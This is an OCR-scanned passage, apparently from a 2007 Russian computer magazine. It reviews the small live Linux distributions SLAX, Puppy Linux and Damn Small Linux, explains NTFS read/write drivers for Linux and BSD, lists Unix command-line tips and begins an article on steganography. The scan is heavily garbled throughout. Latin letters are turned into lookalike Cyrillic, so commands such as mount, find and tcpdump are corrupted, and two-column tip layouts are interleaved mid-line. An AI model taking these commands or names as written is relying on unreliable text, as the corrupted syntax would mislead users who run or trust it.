под конкретные нужды, включив в состав диска нужные приложения. 
Дистрибутив собирается буквально по кирпичикам. Модули (что-то вро- 
де пакетов) имеют расширение то, в составе одного модуля может быть 
размещено несколько приложений, совпадающих по направлению. На 
сайте проекта в каталоге гтюсШез можно найти 1 1 категорий модулей, и в 
каждой несколько десятков готовых решений. 

За й дя на стра н и цу за груз ки 5 ИАХ, ты об на ружи ш ь цел ых 6 ва р иа нто в это го 
дистриба (ЗіапсІагЕ КіІІВіІІ, Зегѵег; Бгобо, Вооі Сй и Рорсогп). В ЗіапсІагсІ и КіІІВіІІ 
в качестве графической среды используется КОЕ. Второй содержит всето же, 
что и первый, плюс в него дополнительнодобавлены программы ѴѴІпе и ООЗВох, 
позволяющие запускать программы ѴѴІпсіоѵѵб и МЗ-йОЗ (поэтому и размер 
чуть больше — 200 Мб). Сюда же включен эмулятор Оети. Облегченная версия 
Рорсогп используетХІюе.а ЕІихЬохты найдешь во всех редакциях, кроме Егобо. 
Егобо — самый маленький по размеру ЗЬДХ (53 Мб), так как в нем вообще нетХ’ов, 
а Рорсогп — несколько облегченная версия, в которой вместо КОЕзадействован 
ХІсе. В версии Зегѵегесть готовые купотреблению серверы: БЫЗ, ОНСР.ЗАМВА, 
НТТР.ѴБЙрсІ, МуЗСИ, зепбтаіі, рораЗб иЗЗН.АВооіСй предназначен только 
для за грузки; далее можно использовать образ, лежащий на диске. Немного 
поискав, ты найдешь еще два неофициальных релиза РгоІезБІопаІ (содержит 
компиляторы) и Наскег(ПОдля анализа сетей). Еслитебе ничего не понравится, 
то можешь сделать свой вариантЗЬАК — на сайте есть все необходимое. 

В версии 5.x используется ЗдиазНЕЗ для сжатия данных и ІІпіопЕЗ для 
множественного монтирования неизменяемых данных (в 51ах 6. X ІІпіопЕЗ 
будет заменена патчем Е2МА и аіЛз). Также хочется отметить хорошую 
поддержку ѴѴІ-ЕІ. 

Итак, с выбором версии ты уже определился, качаем, пишем и загружаем- 
ся. После приглашения ЬооЕ можно ввести ряддополнительных парамет- 
ров. Ты ознакомишься сними, нажав <Е1 > либо почитав файл сЬеаІсобез.ЬсІ, 
лежащий на диске. Например, чтобы использовать ІЗО’шник, сохранен- 
ный на харде, введи: 

ЪооД : зіах 1гот=/с1еѵ/]іс1а1/з1ах . ізо 

По умолчанию ЗЕАХ все изменения сохраняет в ОЗУ, а значит, после пе- 
резагрузки тебе придется повторять все сначала и каждый раз вручную 
сохранять настройки в файл. Не беда — отформатируй раздел в ехі2 и 
укажи его при загрузке: 

ЬооД : зіах с1іапдез = /с1еѵ/]тс1а5 

Теперь все изменения будутзаписываться в этот раздел. И, наконец, 
чтобы загрузить весь диск в ОЗУ, пишем зіах сору2гат. 



После инициализации регистрируемся как гооі; с паролем Іоог и попа- 
даем прямо в консоль. Введя зіаііх, ты увидишь КОЕ, правда, иксы 
будут работать в ѴЕЗА-режиме, поэтому вначале лучше использовать 
хсопі Для запуска ЕІихЬох вместо зіагіх вводи Них. Если хочешь видеть 
ЗЕАХ на харде, вводи біэх-іпбЫІ; для сохранения и восстановления 
настроек вводи сопбдзаѵе и сопбдгезіоге. 

Приложений, естественно, меньше, чем в ѴЕ, но все самое необходи- 
мое для работы есть: КѴѴогб, КЗргеаб, КРгезепІег, Копіасі, КРІауег, б и К, 
КЗЬ, Киіскзбоѵѵ, КМаіІ, Кореіе, Акдгедаіюг, КѴѴіІіМападегитри игры. Из 
собственных разработок присутствует ЗЕАХ Мобиіе тападег, с помощью 
которого устанавливаются предварительно скачанные модули. Все прос- 
то, скромно, но работает быстро (а под Них вообще летает). 

Для локализации интерфейса потребуется два модуля, которые лежат в 
НрУ/Нр.зІах.огд/З І_АХ-5-то ^цІез/тиШІапд : Ри55Іап_ІосаІІ2аНоп_раск_ 
КОЕ_2_0.то и Ри55Іап_ІосаІІ2аНоп_раск_соп5ОІе_2_0.то. 

Кстати, ЗЕАХ послужил базой более чем для 30 дистрибутивов самого 
различного назначения, что тоже кое о чем говорит. 

Рирру І_іпих: четырехлапый пингвин 

ОС: Рирру Еіпих 2.16 

Сайт проекте ѵѵѵѵѵѵ.риррѵііпих.огд 

Дата выхода 17 мая 2007 года 

Лицензия: 6РЕ 
Аппаратные платформы: х86 

Системныетребования I піеі Репііит ІббММХили аналогичный АМР 
СРЕІ, 128 Мб РАМ. 

Состав дистрибутива: Кегпеі 2.6.18.1, ѲССЗ.4.4, ѲІіЬс 2.3.5, 6ѴѴМ 1.8, 

Х.огд 7.0 

Теперь гость из Австралии. Вообще все началось с того, что Барри Кауле- 
ру (Ваггу Каиіег), главному разработчику Рирру, вдругзахотелосьустано- 
вить Еіпих на флеш-брелокдля того, чтобы всегда иметь при себе необхо- 
димые для работы данные и приложения. Этоу него получилось, хотя и не 
сразу. В процессе пришлось решить много задач, например, обеспечить 
автоконфигурацию оборудования и подобрать приложения, занимающие 
минимум места, но при этом обладающие достаточной функциональнос- 
тью. Так и родился Рирру, еще до релиза первой стабильной версии (май 
2005 года) сумевший заполучить большое количество поклонников. 

В отличие от многих дистрибутивов, Рирру собран полностью с нуля, со 
своимиуникальными идеями и наработками. Размер этого дистриба не 
большой (менее 100 Мб), и, в отличие отбольшинства подобных решений, 
которые постоянно подгружают информацию с СБ, он изначально загру- 
жается и работает из оперативки. Приложения откликаются мгновенно, 
но этотребует наличия на компьютере достаточного количества ОЗУ. 

До версии 0.7 было достаточно и 64 Мб, сейчас оптимальным считается 
объем не менее 1 28 Мб, хотя если оперативной памяти не хватает, Рирру 
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может использовать раздел зѵѵар, созданный на диске. Так как при работе 
привод освобождается, его можно использовать по назначению (в качест- 
ве подставки под кофе). 

Кроме использования в качестве І_іѵеСО-дистрибутива, Рирру можно 
установить на жесткий (Ьагб-Рирру) и 2 Ір-диск Ырру-Рирру), флеш-карту 
(йазЬ-Рирру), а также загружать по сети (іЫп-рирру). Также есть версия, 
оптимизированная для работы в эмуляторе Оегтш-Рирру [ ѵѵѵѵѵѵ.егікѵееп. 
сІсІз.піѴдетириррѵ) . и еще с десяток реализаций Рирру отдругих разра- 
ботчиков. Отдельно хочется отметить хорошую работу этого дистрибутива 
на старом оборудовании. 

Работа в ОЗУ имеет единственный, но весьма существенный недостаток: 
при выключении питания вся информациятеряется. Поэтому стоит воп- 
рос о сохранении настроек и установленных пользователем файлов. При 
выключении производится поискдоступного накопителя и, если он будет 
найден, выдается запрос на сохранение настроек, выбирается раздел 
(поддержка ЫТЕЗ присутствует), размер файла и уровень шифрования 
файла (без шифрования, І_ідЫ и Неаѵу). При загрузке Рирру будет искать 
файл с именем рир_заѵе.2^з на каждом разделе диска или флеш-устройс- 
тве. Файл рир_заѵе.2і : 5 является ІоорЬаск-устройством, отформатирован- 
ным под файловую систему ех12, который затем монтируется в/гооС 
Начиная с версии 1 .х возможно использование нескольких сессий 
Сй (при записи образа на СО/ОѴО-дисксессия незакрывается). При 
выключении питания будет выдан запрос о сохранении информации 
(файл, С0/0Ѵ0, нет). При выборе второго варианта все файлы с расши- 
рением іаг.дг, Ьі2, 2 Ір и ідг и настройки автоматически переместятся в 
каталог/гооДагсЫѵе и затем сохранятся на новую дорожку. При следу- 
ющей загрузке будут считаны последние версии всех файлов со всех 
дорожек; если файл был удален, то скрипты не будут его загружать (хотя 
на Сй-диске он остается). После этого диск можно извлекать из привода. 
Если при последующей попытке записи Рирру обнаружит, что места на Сй 
недостаточно, будет выдан запрос на вставку нового диска. Учитывая, что 
сейчас ОѴО-диски дешевы и позволяютзаписатьболее4 Гб информации, 
подобный вариант, надо признать, оченьудобен. 

Итак, загружаемся. В процессе тебя спросято раскладке клавиатуры. 

Если ты не планируешь набивать что-либо на родном языке, то ставь 
английскую. Кслову, ятаки несмогнайти переключатель. Далее — выбор 
Х-сервера. Нажав на <Епіег>, попробуем сконфигурировать работу в 
обычном варианте, иначе придется работать в ѴЕ5А. 

Что можно сказать? Работает Рирру очень быстро. Ярлыки большинства 
приложений вынесены на рабочий стол; вызвав меню, удивляешься, 
как это все удалось втиснуть в такой объем. Здесь есть приложения для 
просмотра, прослушивания, граббинга аудио и видео, записи дисков, 
много редакторов, менеджер паролей и прочее. Приложения для работы в 
сети разбиты на два пункта: Іпіегпеі и Ыеіѵѵогк. Практически все действия 
можно произвести из меню, не вызывая консоль. Например, вставьфлеш- 
ку, выбери «Мепи -> Еііезузіет -> Ртоипі тоипі/иптоипі сігіѵез» и укажи 
раздел. Утилита покажет, куда он смонтирован. 



йатп Бтаіі І_іпих: маленький Кноппикс 

ОС: йатп Зтаіі Ыпих (05І_) 3.3 
Сайт проекте - ѵѵѵѵѵѵ.батпзтаІШпих.огд 
Дата выхода: 3 апреля 2007 года 
Лицензия: 6РІ_ 

Аппаратные платформы: х86, АМй х86-64 

Системныетребования: 486 ОХ, рекомендуется Репбит 200 или анало- 
гичный АМР СРІІ, 8 Мб (СИ) или 24 Мб РАМ 

Состав дистрибутива: Кегпе12.4.26 с поддержкой 5МР, 6СС3.3.1 , ОІІЬс 
2.3.2, Е1ихЬох0.9. 11 и ЗѴѴМ 0.24, ХЕгее86 4.3.0 

Разработчики 05І_, пытаясь засунуть диск с Кноппиксом в карман 
рубашки, решили, что размер все-таки имеет значение и создали 
новый дистрибутив, выкинув все, по их мнению, ненужное и кое- 
что добавив. В от та к и появился 05Е. Если ты ранее сталкивался 
с Кпорріх, то найдешь много знакомого, удивят только размер и 
возможности. Традиционно ОЗЕзанимаетбОМби легко умещается на 
бизнес-карточку. 

После загрузки пользователь в свое распоряжение получает 
полный набор приложений: ХММ5 (трЗ, Сй и МРЕѲ), клиент РТР, 
браузеры О і Но , N еі: гі к и Еігеіюх, ЗуІрЬеесІ, файловые менеджеры 
еппеІЕМ и МС, ПО для работы с электронными таблицами, текстовый 
процессор Теб, три редактора (Веаѵег, Ѵіт и Ыапо), Хрбф Ыаіт (АІ М, 

I С О, ІРС), дРЬопе, ѴЫСѵіѵѵег, Рсіезкіюр, сервер и кл иент 55Н/5СР, 
клиент ОНСР, РРР, РРРоЕ, веб- и ЕТР-сервер, Здіііе, приложения 
для мониторинга системы, утилиты для администрирования, игры. 
Поддерживаются 115В, РСМСІАи некоторые беспроводные девайсы. 
Учитывая малый вес приложений, йЗЕ отлично себя чувствует 
на старом оборудовании. Если тебе этого мало, вызывай МуйЗЕ 
Ехіепзіоп Тооі и устанавливай недостающее из репозитария 05І_. 

В 1 1 категориях можно найти все что угодно: от средств разработки 
и драйверов до игр и мультимедиа. Все приложения можно найти в 
меню. Есть инструменты, позволяющие пересобирать дистрибутив 
под свои требования. 

Если требуются права гооі, используй зисіо. Кстати, тс в этом случае ста- 
новится красным. При необходимости все настройки можно сохранить в 
файл. Ксожалению, с локализацией в 05І_ не фонтан. Выбор при загрузке 
сізі Іапд=ги никакого влияния на дальнейший процесс не оказывает, нет 
даже шрифтов. Да и как это все уместить в такой объем? 

Изначально йЗЕ — это ЫѵеСВ-дистрибутив, хотя после загрузки, 
выбрав один из пунктов меню, его легко можно установить на жес- 
ткий диск или II 5 В -де вайе. Вменю «Аррз -> Тооіз -> Іпзіаіі Іо II 5 В 
Репбгіѵе» два подпункта: ІІ5В-2ІР Репбгіѵе и ІІЗВ-НОО Репбгіѵе. 
Связано это с тем, что сегодня существует два стандарта хранения 
информации на ІІЗВ-флеш. Я выбрал второй вариант, установка и 
загрузка прошла без проблем. ~й~ 
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ІМТР5: учимся читать 



^ ипіхоісі 




Обеспечиваем полный доступ к ЫТРБ-разделам под Ыпих/ВБО 

Половина юниксоидов уверена, что поддержка ИТРЗ в Ілпих/ВЗБ отсутствует. Другая по- 
ловина знает, что ШТЗ-тома доступы по крайней мере на чтение, но писать они опасаются, 
наслушавшись ужасных историй о разрушенных данных десятилетней давности. В действи- 
тельности ШТ5-драйверы уже несколько лет как отлажены и достаточно стабильны. Однако 
в работе с ШТЗ есть куча тонкостей, игнорирование которых приводит к развалу файловой 
системы. Как избежать краха? Как восстановить поломанный том? Мыщъх знает. И не толь- 
ко знает, но и готов рассказать тебе. 



отребность в работе с ЫТРЗ-разделами в Ыпих/ВЗО возни- 
кает достаточно часто, особенно при совместном использо- 
вании нескольких операционных систем (одной из которых 
является І\ІТ, или что-то производное от нее) на мультизагру- 
зочном винчестере. Проблема втом, что N1 крайне враждебно относится 
ксвоим конкурентам и принципиально не переваривает«чужеродные» 
файловые системы. А Ыпих и В50 из всех файловых систем, входящих в 
І\ІТ, штатным образом поддерживаюттолько РАТ1 2/1 6/32 (причем русские 
имена часто превращаются в «крякозябры»). 

Как организовать обмен данными между І_іпих/В50 и N1? Некоторые 
предпочитают использовать флешки, благо их объем постоянно растет и 
они вполне годятся на роль файлообменника. Еще можно отформатиро- 
вать один или несколько разделов диска под РАТ, однако это не лучший 
выход из ситуации. РАТ страдает множеством ограничений: он часто те- 
ряет кластеры, не поддерживает файлы и диски большого объема, также 
отсутствуют атрибуты защиты и т. д. Чем скорее мы забудем это наследие 
времен М5-Р05 —тем лучше. Другой вариант — установить ЫТ-драйвер, 
позволяющий Винде работатьс Ыпих/ВВО-разделами каксо своими 



собственными. Такие драйверы действительно есть, хотя и не получили 
большого распространения. Написанные энтузиастами (у которых нет 
ни средств, ни времени для продвижения их на рынок), они пылятся на 
серверах, никем не рекламируемые, и большинство пользователей даже 
не подозревает об их существовании. А зря! Взять хотя бы ^збгѵ-драй- 
вер, добавляющий в ЫТ поддержку РР5/ІІР5 (основных файловых систем 
Ргее/Ыеі/ОрепВВО). Отличная штука, которую (вместе с исходными 
текстами) можно бесплатно скачать с Двбп/ъРпеІ. 

Обратную операцию (то естьзаставить Ріпих/ВЗО понимать ІЧТР5) 
осуществить намного сложнее. И совсем не потому, что КІТР5 — весьма 
продвинутая файловая система, которая ореп воигсе программистам не 
позубам. Вовсе нет! В мире ІІЫІХ встречаются и более навороченные ФС 
(например, ПеізегРЗ). Причина втом, что М іеговой держит ЫТР5 под спу- 
дом, отказываясь ее документировать, и потому расшифровку всех ключе- 
вых структур приходится выполнять путем обратного проектирования, что 
требует высокой квалификации исследователей, а сама реконструкция 
спецификации отнимает кучу времени и сил.такчто по большому счету 
это не программистская, а хакерская работа. 
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Графический менеджер драйвера іізсігѵ 



Главная страница проекта Ыпих-ЫТРЗ 



С момента появления ЫТР5 прошло более 1 5 лет, и за это время она была 
изучена вдоль и поперек. Свободные драйверы уже давно миновали ста- 
дию бета-версий, освоившись нетолько с чтением, но и сзаписью. Риск 
разрушения тома из-за ошибки в свободном драйвере является скорее 
психологическим, чем техническим фактором. Миллионы пользователей 
□ пих/ВЭБ монтируют ЫТРЗ-разделы на запись, доверяя свободным 
драйверам свои данные, и никто нежалуется! Единичные отказы, естест- 
венно, случаются, но имеют поправимый характер. 

Составители *піх-дистрибутивов, проявляя свойственную им осторож- 
ность, либо вообще не включают в них свободные І\ІТР5-драй веры, либо 
поумолчанию монтируют МТР5-разделы только на чтение, вызываяу 
пользователей уверенность, что запись реализована не лучшим образом 
и от нее следует держаться подальше. Действительно, ЫТРЭ-драйверы не 
свободны отпроблем, и неподготовленному пользователю лучше с ними 
не связываться, однако все проблемы решаемы! Главное — это желание! 
Ну и документацию тоже невредно почитать. 

ІЧТР5 в І_іпих 

Первые свободные КІТРЗ-драйверы возникли в рамках проекта Ыпих- 
КІТР5 РгоіесР Он был основан хакером по прозвищу Магііп ѵоп Роеѵѵіз 
в далеком 1 995 году (напоминаем, что М іеговой выбросила КІТР5 на 
рынок в 1 993 году) и объединил целую плеяду знаменитых кодокопа- 
телей, которым потребовалось 2 года напряженных исследований на 
расшифровку базовых структур данных и создание первой стабиль- 
ной версии свободного ЫТРЗ-драйвера, включенного в Ыпих-ядро 
в 1 997 году (версия 2.1 .74). Группа просуществовала до конца 90-х, а 
затем распалась. Причиной тому послужила мелкая ошибка в драй- 
вере, вылившаяся в крупные неприятности. Драйвер не проверял 
версию файловой системы, поскольку в тот моментдругих версий ЫТР5 
попросту не существовало в природе! Но с выходом ѴѴ2К Місговок 
преподнесла довольно пакостный сюрприз в виде несущественных с 
точки зрения конечного пользователя, но фатальных сточки зрения 
программиста изменений файловой системы. В базовые структуры дан- 
ных была добавлена пара новых полей. Соответственно, смещения всех 
остальных изменились, а драйвер, ожидающих их по старым адресам, 
припервойже попытке записи делал из диска кашу. Это не самым луч- 
шим образом сказалось на его репутации, которую было уже не поднять 
и домкратом. Большинство историй о страшных разрушенияхтипа «дня 
Помпеи» берет свое начал о именно здесь. 

В 2002 году вышла новая версия І\ІТР5-драйвера, переписанного с нуля 
уже новым командным составом: Апіоп Аііарагтакоѵ (лидер группы, со- 
здатель драйвера и служебных ИТЕВ-утилит), ПісЬагсІ Пиввоп, бакоЬ Кеті 
(создатели загружаемого модуля ядра), Раѵѵеі Коі (портирование нового 
драйвера в ядро) и другие. 

Готовый к установке драй вер можно бесплатно скачать с сайта ѵѵѵѵѵѵ.ііпцх- 
пИъ.огд . построенного потехнологии ѵѵікі, существенноупрощающей про- 
цесс внесения изменений иуточнений в спецификацию, полученную, какуже 
говорилось, путем обратного проектирования и до сих пор незавершенную. 



Місговок не стоит на месте и непрерывно модифицируетсвою файловую 
систему, вынуждая хакеров продолжать расшифровку, с чем они справля- 
ются вполне успешно, и текущая версия свободного драйвера поддержи- 
вает І\ІТР5-разделы, созданные следующими операционными систе- 
мами: ЫТ 4.x, ѴѴ2К.ХР, 5егѵег2003 и Ѵізіа (включая 32-битные и 64-битные 
версии). Драйвер превосходно справляется с чтением ЫТРЗ-томов, 
однако до сих пор не поддерживает запись в сжатые, зашифрованные или 
разряженные файлы (врагве-Пев), что, собственно говоря, и неудиви- 
тельно, поскольку поддержка записи появилась лишь в 2005 году и про- 
граммистам еще предстоит проделать уйму работы, прежде чем они до- 
ведутее до ума. Практически все крупные дистрибутивы (за исключением 
ПебНаі/РесІога) уже поддерживают ЫТР5, и потому конечным пользовате- 
лям нет никакой необходимости совершать какие-либо дополнительные 
телодвижения, ну разве что установить более свежую версию драйвера 
(примечание: ПебНаІ: и Ребога включают в себя альтернативный открытый 
драйвер ІЧТР5-ЗѲ, о котором мы расскажем чуть ниже). 

Проверить, поддерживает литвой дистрибутив ЫТР5, поможет команда 
саі/ргос/Пезузіетз, и если ЫТР5 действительно поддерживается, том 
смонтировать можнотак: 

# тксІіг/тпС /т.пскжз 

# тоипС/сІеѵ/ІтсІаІ/тпС/міпсІомз -С пСГз -г -о п1з=иС:Е8 

Здесь ключ '-г' означает монтированиетолько на чтение; если его убрать, 
то раздел будет доступен и на запись. 

Акакбыть, если нам оченьхочется заполучить полноценную поддержку 
ІМТР5, включающую в себя работу сжурналомтранзакций, запись в 
сжатые или разряженные файлы? Тогда можно воспользоваться одной из 
многочисленных оберток штатного драйвера пііъ.зуз, которая подгружа- 
ет его в виртуальную среду, эмулирующую исполнительную подсистему 
піозкгпі.ехе и обеспечивающую прозрачный ввод/вывод. 

Достоинство этого метода в том, что мы получаем стопроцентную сов- 
местимость с ІЧТРЗ-разделом, и потому риск испортить данные мини- 
мален. Ктомуже родной І\ІТР5-драйвер обеспечивает намного более 
высокое быстродействие. Правда, эмулятор исполнительной системы 
съедает немалое количество памяти, что есть главный и, пожалуй, единс- 
твенный существенный недостаток. Естественно, помимо обертки, нам 
потребуется дистрибутив ѴѴІпбоѵѵз, поскольку л и ценз ионные соглашения 
запрещаютсвободное распространение его компонентов. Но это не про- 
блема! Еслиу насесть І\ІТР5-раздел, то логично предположить, чтоу нас 
имеется по меньшей мере одна копия ѴѴІпбоѵѵз, так какутру-юниксоидов 
потребности в работе с ЫТР5 просто не возникает. 

Осталось решить, какую обертку выбрать. Мыщъх долгое время поль- 
зуется оберткой от бап’а КгаІосИѵіІ’а, которую рекомендует и всем ос- 
тальным. Последнюю версию, выпущенную в начале 2006 года, можно 
бесплатно скачать с ѵѵѵѵѵѵдапкгаІосЬѵіІ.пеі/ргощсіѴсарІіѵе . 

Архитектурно она состоит из свободной библиотеки РІІ5Е (расшифро- 
вывающейся как Еііезувіет іп ІІвегврасе — файловые системы в 
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Главная страница проекта ЫТР5-ЗѲ 




До^ 

ста 



омашняя страничка іап’а Кгаіюсбѵіі’а — создателя бесплатной обертки 
ндартного драйвера пііз.зуз 



пользовательском пространстве Ризе.зіпеі: ]]. эмулятора исполнитель- 
ной подсистемы N1, написанного на базе фрагментов исходныхтекс- 
тов, «позаимствованных» из открытого проекта РеасЮ5 [ ѵѵѵѵѵѵ.геасіоз. 
сот ], транслятора запросов ввода/вывода, сделанного непосредс- 
твенно самим іап’ом КгаіосбѵіГом, и драйвера п^з.зуз, который пользо- 
ватель должен самостоятельно выдрать из ѴѴІпбоѵѵз-дистрибутива. 
Монтирование дисков осуществляется вполне стандартным путем: 

# тксііг /тпк /сіізкс 

# тошік -к саркіѵе-пккз /<іеѵ/кс1а1 /тпк /сіізкс 

Кстати говоря, поскольку рассматриваемая обертка реализована как 
прикладной процесс, с одной стороны, она неуронитядро, если что-ни- 
будь пойдет нетак, но с другой — «продвинутый» (в кавычках) пользо- 
ватель может «покил ять» процесс, не дав драйверу сохранить на диск 
модифицированные данные, что чревато крахом всего дискового тома. 

ЫТР5 вхВБй 

В5й- подобные системы намного менее популярны, по сравнению с 
Ыпих.а на рабочих станциях они вообще редкость, всвязисчем ЫТР5- 
драйверы под них появились с большим опозданием. 

Первый экспериментальный драйвер (кстати говоря, написанный рос- 
сийским программистом, скрывающимся под ником Семен) датируется 
1 999 годом, то есть он появился спустя целых 2 года после выпуска ста- 
бильной версии открытого Ыпих-драйвера — в компьютерной индустрии 
это огромный срок! Однако, после выхода нескольких бета-версий, пыл 
автора начал постепенноугасать и менее чем через полгода достигабсо- 
лютного нуля. Обещанная полнофункциональная версиятаки не вышла, 
в чем можно убедиться, посетив сайт іс[иЬ.пзи.ги/~5етеп/пН5 . 



Несколько лет назад Апіоп АІіара гтакоѵ перенес открытый І\ІТР5-драй- 
вер с Ыпих’а на Мае 05 X, отбранчив отосновного проекта побочный 
продукт под названием ЫТР5-ЗѲ ргоіесі, в настоящее время поддержи- 
вающий Мае 05 X, РгееВ5й, ЫеіВ50, Ве05 и Наіки. 

Последнюю версию драйвера, датируемую 17 июня2007 года, вместес 
исходными текстами и документацией можно бесплатно скачать с сайта 
ѵууѵѵу.п^з-Зд.огд . Однако вполне возможно, что ничего скачивать и не 
потребуется, поскольку некоторые дистрибутивы (как, например, РС- 
В50), уже включают в себя драйвер ЫТР5-36 (естественно, второй или 
даже третьей свежести): 

# тоипк -к пккз-Зд/сіеѵ/ккіаІ/тпк/ѵ^іпсіоѵ^з -о 1оса1е=ги_ 

КЛ . ик к 8 

Кстати говоря, при попытке использования драйвера ЫТР5-30 под 
виртуальной машиной ѴМѴѴаге версии 5.0 и выше, последняя заверша- 
ет свою работу крахом, для преодоления которого достаточно добавить 
в ѵтх-файл следующую строку: 

таіпМет. изеЛатесІРі1е=РАЬ8Е 

Заключение 

Судя по всему, Місгозоіі утратила к N155 всякий интерес, и, вопреки 
громким заявлениям о создании файловой системы нового поколе- 
ния, Виста вышла с той же самой версией N155, что и ХР. Благодаря 
этому обстоятельству, хакеры получили огромное преимущество, успев 
завершить расшифровку основных структур данных и выпустить откры- 
тые драйверы, поддерживающие более или менее полноценную работу 
с І\ІТР5-разделами без угрозы потери данных. зц 



Меры предосторожности при записи на ЫТРБ-разделы 



• Перед записью данных на ЫТР5-раздел из 
Ыпих/В50 настоятельно рекомендуется загрузить 
ѴѴі псіоѵѵз и запустить сИксізк, чтобы убедиться 
в отсутствии ошибок. Дело в том, что штатный 
драйвер автоматически диагностирует дефекты 
файловой системы, блокируя запись до момента их 
исправления, а свободные драйверы — нет. 
•После удаления/перемещения большого 
количества файлов и/или каталогов из-под 
Ыпих/В50 обязательно загрузи ѴѴі псіоѵѵз и 
запусти сбксізк, поскольку свободные драйверы 
не учитывают ряд тонкостей N155, что ведет к 



накоплению мелких ошибок. 

• При проверке тома, в который что-либо записы- 
вали свободные ЫТР5-драйверы, сбксізк, какпра- 
вило, выдает сообщения об ошибках, однако это 
не повод для волнений. Обратись кдокументации, 
прилагаемой кдрайверу, — в ней перечислены все 
некритичные ошибки и коротко описаны причины 
их появления. 

• Никогда, ни при каких обстоятельствах не 
монтируй І\ІТР5-раздел на запись, если работа 
ѴѴі псіоѵѵз была завершена неправильно! В этом 
случае в журнале транзакций могут остаться 



записи, обеспечивающиеоткатпри последующей 
загрузке операционной системы. Однако открытые 
драйверы все еще не поддерживаюттранзакции, 
а последствия отката диска, на который уже что-то 
писалось, непредсказуемы. 

• Раздел, хотя бы однажды заполненный более 
чем на 90%, подвергается большому риску при 
монтировании на запись из-под Ыпих/ВОй, 
поскольку при этом происходитусечение области, 
зарезервированной под метаданные. Свободные 
І\ІТР5-драйверы обрабатывают эту ситуацию не 
совсем корректно. 
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^ ипіхоігі 



пЧгіскз 



юниксоида 



Доблестный юниксоид! 
Представляю твоему вни- 
манию очередную под- 
борку различных трюков, 
рекомендаций и советов, 
касающихся *піх-систем. 



ОБузІет 

Получить полный листингактивных правил 
ірІаЫез: 

# ірРаЫез -р пар -Ь -п -ѵ 

# ІрРаЫез -Р шапдіе -Ь -п -ѵ 

# ІрРаЫез -Р РіІРег -Ь -п -ѵ 

Чтобы насильно обновить грт-пакеджи, 
используй: 

# грт -ііѵіі --посіерз --Рогсе * . грт 

Содержимое системного журнала можно 
вывести на отдельную консоль, доступную по 
комбинации клавиш <СМ+АІІ+Р12>: 

$ Раіі -б /ѵаг/іод/теззадез > /сіеѵ/ 
РРу12 

Монтирование образа, созданного в ѴѴІпбоѵѵз 
с помощью Ыего Вигпіпд Вот: 

# тоипР -Р иЫ,ізо9660 -о 
1оор,го,оРРзеР=307200 ітаде.пгд 
/тпР 

Линуксовое семейство Із*-команд: 

ІзоР — список всех открытых 
файлов; 

Ізтосі — список всех загруженных 
модулей; 

Ізрсі — список РСІ -устройств; 

ІзизЬ — список II 5 В -устройств; 

Іззсзі — списокБСБІ-устройств; 

Ізіш — полный список всех присутствующих 
в компьютере устройств. 



ТРЮКИ И СОВЕТЫ ЮНИКСОИДУ 








$ ткРіРо -/туіпоиР 
$ Ріпсі /изг/згс > -/туіпоиР & 

$ тоге -Р -/туіпоиР 

Преобразовать справочную тап-страницу в 
обычныйтекстовый файл: 




ОЗЬеіі 

Поменять в файле тубІе.М все слова [иск на 
Наск с помощью регі: 

$ регі -рі -е ' з/1иск/Ь.аск/д ' 




турііе . РхР 




$ тап рР.сопР | соі -Ь > -/рР.РхР 


То же самое проделывается в ѵі/ѵіт следую- 




Укороченная запись для создания резервной 


щим образом: 




копии файла: 


$ ѵі турііе. РхР 




# ср /еРс/раззж1 { , .Ьак} 


: 1 , $з/1иск/Ьаск/д 










Тоже самое, но с учетом текущей даты: 


Убрать все символы Л М из 005'овского 




# ср /еРс/раззжі{ ,_'сіаРе +%Ь%т%У' . 


файла: 




Ьак} 


$ соі -Ьх < сІозРіІе.РхР > пеміііе. 






РхР 




Удалить все пустые строки из файла іезРіп: 






$ зесі -е '/ А $/сР РезР . іп > РезР.оиР 


В текущей директории привести имена всех 






файлов и каталогов к нижнему регистру: 




□ Ыеіѵѵогк 


$ " 1з" 1 ѵРЬіІе геасі паше; сіо шѵ 




Получение нужного РРС (в данном случае по 


"$паше" " 'есРю $паше I Рг А-2 а -г'"; 




ІРзес) с помощью штатной программы ѵѵбоіз: 


сіопе 




$ ѵіЬоіз -Ь ѵіЬоіз . гРс . огд . ик 2401 I 






Іезз 


Поискзаданного слова в каталоге/изг/згс: 






$ Ріпсі /изг/згс -Руре Р -ехес дгер 




Преобразование ІР-адреса в шестнадцате- 


-і Паск { } \ ; 




ричный формат, может понадобиться, напри- 






мер, при настройке капризного бездискового 


Более информативный вывод (с помощью 




клиента: 


этого способа я нашел кучу багов в ОрепВБй): 




$ ргіпРР "%02Х%02Х%02Х%02Х\п" 192 


$ Ріпсі /изг/згс -Руре Р -паше 




168 5 253 


’ *. [сЬу] 1 -ргіпР | хагдз дгер -іпС 




С0А805РБ 


ііаск 




# Іп -з /РРРрЪооР/ЪооР . пеР / 






РРРрЪооР /С0А8 05РБ . 81Ж4М 


Получить размер всех директорий в нужном 






каталоге: 




Чтобы посмотретьсписоксвоих расшарен- 


$ Ріпсі /изг/згс -тахсіерРЬ 1 -Руре сі 




ныхБМВ и ЫРБ-ресурсов, набирай: 


-ргіпР | хагдз сіи -зк I зогР -гп 




$ зтЪсІіепР -п -Ь 127.0.0.1 






$ зЬочшюипР -е 


В некоторых случаях для получения списка 






директорий в текущем каталоге может ока- 




Ловим весь входящий трафик, исключая 


заться полезным псевдоним біг: 




при этомтрафик, генерируемый нашей ззб- 


аііаз сИг='1з -аІР 1 дгер А сІ' 




сессией (здесь 21 2.34.ХХ.УУ — сервер, 87.240. 






ХХ.УУ- клиент): 


Как вариант: 




# /изг/зЪіп/Рсрсіитр -і РхрО -пппРРР 


аііаз сЗіг='1з -аІР 1 дгер /$' 




1 сізР РюзР 212 . 34 .XX. УУ апсі пор (зге 






РюзР 87 . 240 . XX . УУ апсі сізР рогР 22 ) ' 


Создать пайп для работы с программами, 






которые неумеют должным образом работать 




Чтобы протестировать работу сетевого 


сБТРІІМ/БТРОЦТ ІРіпсІ приведен здесьтолько 




сервиса, который работает через 55Б, 


для примера, всю нижеследующую конструк- 




выполняем: 


цию можно заменить более простой: 




$ орепззі з_с1іепР -соппесР 


Ріпсі /изг/згс I тоге) : 




192.168.1.1:443 И 
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^ согііпд 




СЕРГЕЙ «ионы РВОЗТ» КОЛЕСНИК 



Секреты 
Джеймса Бонда 



Передаем скрытые сообщения в файлах формата *.1х1 

В последнее время интерес к стеганографии начинает превышать интерес к криптографии, 
и это понятно, ведь скорость взлома шифрованной информации зависит только от мощности 
